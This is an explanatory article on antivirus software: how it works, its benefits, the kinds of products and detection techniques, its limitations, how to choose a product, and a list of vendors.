What is antivirus software?

How antivirus software works

Antivirus software normally runs as a background process, scanning computers, servers or mobile devices to detect and restrict the spread of malware. Many antivirus software programs include real-time threat detection and protection to guard against potential vulnerabilities and perform system scans that monitor device and system files, looking for possible risks.

The best antivirus software usually performs these basic functions:

• Scans directories or specific files against a library of known malicious signatures to detect abnormal patterns indicating the presence of malicious software.
• Enables users to schedule scans so they run automatically.
• Lets users initiate new scans anytime.
• Removes any malicious software it detects either automatically in the background or notifies users of infections and prompts them to clean the files.

To scan systems comprehensively, antivirus software must have privileged access to the entire system. This makes antivirus software itself a common target for attackers, and researchers have discovered remote code execution and other serious vulnerabilities in antivirus software products in recent years.

Benefits of antivirus software

The purpose of antivirus software is to defend a system against security threats and vulnerabilities and provide real-time protection through automated vulnerability scans.

Antivirus software provides several benefits:

• Virus and malware protection. The main benefit of antivirus software is to protect against malicious viruses such as malware and spyware. Most cyberthreats today present themselves as multipronged threat vectors that can attack system data, steal confidential information, spy on system resources and degrade system performance simultaneously. Therefore, having reliable antivirus software running at all times is imperative.
• Protection against spam and pop-ups. Among the most common ways viruses infiltrate and infect a system is through pop-up advertisements and spam-based webpages. Antivirus software keeps the system secure by automatically blocking pop-ups and spam coming from malicious websites.
• Web protection. Antivirus software helps protect against the scam websites threat actors use to gather credit card and bank information from unsuspecting users. By restricting access to harmful websites, a reliable antivirus program can prevent users from accessing unauthorized networks.
• Real-time protection. Antivirus software acts as a real-time shield that scans each inbound file and program. Depending on the settings of the antivirus program, once an infected file or program is detected, it's either automatically deleted or moved to a quarantine folder for further analysis. A quarantined file is prevented from interacting with the rest of the machine and its programs to mitigate damage.
• Boot-scan command. Sophisticated viruses can often duplicate themselves while the system is active. However, an antivirus program can prevent a virus from self-replicating by invoking a boot-scan command. This command shuts down the operating system (OS), restarts the computer and scans the entire hard drive for viruses and malware. During the scan, the virus is detected and doesn't get a chance to self-replicate due to the deactivation of the OS.
• Dark web scanning. Data from most data breaches, such as ransomware attacks, is often leaked on the dark web. Many antivirus tools can help organizations discover if their sensitive data is leaked on the dark web. For example, if they find an associated email address or account number on the dark web, they can notify the user and update the password to a new and more complex one.
• Protection from external devices. Most people regularly plug in external devices, such as hard drives and USB adapters, to their computers. Antivirus software scans all attached devices and peripherals to thwart potential viruses from entering the system through external sources.

Types of antivirus programs

Antivirus software is distributed in several forms, including standalone antivirus scanners, machine learning and cloud-based programs, malware signatures and internet security software suites that offer antivirus protection, along with firewalls, privacy controls and other security protections. Popular providers of both free and commercial antivirus products include AVG Technologies, Kaspersky, Malwarebytes, McAfee, Norton and Trend Micro.

Some antivirus software vendors offer free basic versions of their products. These provide basic antivirus and spyware protection, but more advanced features and protections are usually available only to paying customers.

While some OSes are targeted more frequently by virus developers, antivirus software is available for most OSes:

• Windows antivirus software. Most antivirus software vendors offer several levels of Windows products at different price points, starting with free versions offering only basic protection. Users must perform scans and updates manually. Free versions of antivirus software won't usually protect against links to malicious websites or malicious code and attachments in emails. Premium versions of antivirus software often include suites of endpoint security tools that provide secure online storage, ad blockers and file encryption. Since 2004, Microsoft has been offering free antivirus software as part of the Windows OS, generally under the name Windows Defender, though the software was mostly limited to detecting spyware before 2006. Microsoft now offers Microsoft Defender Antivirus as part of its Microsoft 365 Defender portal, which is available for Windows 10, Windows 11 and some versions of Windows Server.
• MacOS antivirus software. Although Apple macOS viruses exist, they're less common than Windows viruses, so antivirus products for Mac-based devices are less standardized than those for Windows. There are several free and paid products available, providing on-demand tools to protect against potential malware threats through full-system malware scans and the ability to sift through specific email threads, attachments and various web activities.
• Android antivirus software. Android is the world's most popular mobile OS and is installed on more mobile devices than any other OS. Because most mobile malware targets Android, experts recommend all Android device users install antivirus software on their devices. Vendors offer a variety of free basic and paid premium versions of their Android antivirus software, including antitheft and remote-locating features. Some run automatic scans and actively try to stop malicious webpages and files from being opened or downloaded. Play Protect is Google's built-in malware protection for Android, which was first released with Android 8.0 Oreo, and now comes with every Android device that has Google Play services version 11 or newer installed on it.

Virus detection techniques

Antivirus software uses a variety of virus detection techniques. Six common types are:

1. Signature-based detection. Antivirus programs depend on stored virus signatures -- unique strings of data that are characteristic of known malware -- to flag malicious software. The antivirus software uses these signatures to identify viruses it encounters that security experts have already identified and analyzed.
2. Heuristic-based detection. This type of detection uses an algorithm to compare the signatures of known viruses against potential threats. With heuristic-based detection, antivirus software can detect viruses that haven't been discovered yet, as well as existing viruses that have been disguised or modified and released as new viruses. However, this method can also generate false-positive matches when antivirus software detects a program behaving similarly to a malicious program and incorrectly identifies it as a virus.
3. Behavior-based detection. Antivirus software can also use behavior-based detection to analyze an object's behavior or potential behavior for suspicious activities and infer malicious intent based on those observations. For example, code that attempts to perform unauthorized or abnormal actions would indicate the object is malicious or, at least, suspicious. Some examples of behaviors that potentially signal danger include modifying or deleting large numbers of files, monitoring keystrokes, changing settings of other programs and remotely connecting to computers.
4. Cloud analysis. According to Atlas VPN, in 2025, over 34 million new malware samples have been discovered. Since it's impossible for any antivirus program to combat the vast number of rapidly appearing malware variants, antivirus companies now provide cloud analysis as part of their antivirus offerings. Cloud analysis is done on the cloud using the antivirus vendor's servers. This way, if a malicious file or program is detected by the antivirus program, it's sent to the vendor's labs, where it's tested. If it's confirmed to be malicious, a signature is created for it, which blocks it from all the other devices where it's detected.
5. Sandbox analysis. This detection technique runs a program or file in a virtual sandbox environment to analyze its behavior before permitting it into the system. Using this technique, antivirus software only permits a file to execute in the real environment if the sandbox analysis confirms it to be safe. This feature is also used for running files that the antivirus program is unable to allowlist or denylist. Since the files are executed in an isolated environment, even if they end up being malicious, no harm is done to the system, as they're only executed in a virtual sandbox container.
6. Host intrusion prevention system (HIPS). Security and antivirus software commonly use this technology to detect potentially malicious activities in a program using signature-based detection. A HIPS continuously monitors each activity and instantly notifies users by presenting them with authorization options, such as Allow and Block.

Challenges facing antivirus software

According to Cybercrime Magazine, 90% of the world's population, ages six and older, will be connected to the internet by 2030. This exponential growth in internet connections is also responsible for the significant rise in viruses and cyberattacks.

While antivirus programs were originally developed to combat viruses and cyberthreats, they do come with some limitations.

Here are current and future challenges of antivirus software:

• Antivirus software that uses only signature-based detection can't expose new types of malware, including variants of existing malware. Signature-based detection can only detect new viruses when the definition file is updated with information about the new virus. With the number of new malware signatures increasing rapidly, making antimalware software based solely on signatures is impractical. However, signature-based detection doesn't usually produce false-positive matches.
• Even the best antivirus software can sometimes erroneously identify a secure piece of a program or file as malware, which can lead to a legitimate and important file or program getting quarantined or deleted. Free antivirus options are typically more prone to false positives than paid services; they don't often provide enterprise-level scanning and detection of attacks and threat vectors.
• Antivirus software can sometimes interfere with system updates by preventing them from happening or halting them in the middle. In most cases, the user must take the extra step of disabling a firewall before attempting to install system updates or firmware upgrades.
• Antivirus software runs quietly in the background and is barely noticeable, but it can consume a lot of system resources, including memory and disk space, slowing a device's performance. The antivirus scanning feature can also cause noticeable lags in the network.
• Regular antivirus software provides just one layer of virus protection. For comprehensive protection, most organizations must invest in a multilayered approach, such as both hardware- and software-based firewalls or a complete internet security suite that includes antivirus options.

Ever-evolving trends in technology, including metaverse, Web3, fintech and autonomous vehicles, make it more challenging to get the right antivirus protection. With so many endpoints to secure -- from crypto wallets to virtual reality devices -- there are times that antivirus software can fall short. Most traditional antivirus technologies can't detect modern fileless attacks that use trusted systems, such as PowerShell, to carry out the attacks.

How to select antivirus software for an organization

Considering the many different antivirus products on the market, a careful selection process is recommended. Several important decision factors should be addressed before acquiring a product. Here are some of those considerations:

Reliability and compatibility

• The program should not cause conflicts or malfunctions with other software apps.
• The product should be compatible with existing OSes (e.g., Windows, macOS, Linux).
• The product should be compatible with the devices to be protected (e.g., computers, smartphones, tablets).

Ease of use

• Look for intuitive products that do not require special skills and training to operate properly.
• There should be a user-friendly interface that facilitates easy access and feature configuration

Features and level of protection

• The program should deliver 24/7 protection against a broad range of malware (e.g., viruses, worms, Trojan horses).
• Look for strong antimalware and ransomware detection features, along with resources that mitigate attacks when detected.

Maintenance

• Regular database updating and patching keep antivirus software up to date with the latest threat actors.
• Technical support should be available to facilitate maintenance and deal with disruptions.

Protection approach

• Protection should be continuous and accommodate scanning files and websites as they are accessed.
• Consider products that include malware and ransomware detection
• Additional features of interest might include firewalls, parental controls and virtual private networks (VPNs).

Performance characteristics

• Determine if the software will have a material impact on computer performance and resource usage (e.g., CPU and RAM).
• Key scanning attributes include full scans and quick scans that can be managed in real time.

Third-party assessments

• Examine results of tests conducted by independent firms such as AV-TEST and AV-Comparatives for ratings of antivirus software.
• User comments and reviews on antivirus software can be a helpful supplement to independent tests.

Financials and administrative issues

• Select a product that offers the required features and protection that fits within technology budgets.
• Consider open source and free products.
• Pricing options can include one-time fixed prices, annual subscriptions or monthly fees.
• Identify and weigh issues such as installation and testing, user training, access to a help desk, and availability of documentation.

Antivirus software vendors

Here is a brief list of antivirus product vendors:

• Avast.
• Avira.
• Bitdefender.
• ESET.
• G Data Antivirus.
• Kaspersky.
• Malwarebytes.
• McAfee.
• Microsoft Defender.
• Norton Antivirus.
• Norton 360 Select with LifeLock.
• Sophos.
• Surfshark Antivirus.
• Total AV Antivirus.
• Trend Micro.
• Webroot.

Consider all the selection criteria mentioned in this article when looking at a new installation or upgrading an existing product. The ability to test software offline is important before putting a system into production.

While antivirus software can mitigate certain ransomware attacks, it can't stop or remove ransomware once it's taken control of a system. Take advantage of a step-by-step guide on how to remove ransomware and minimize its effect.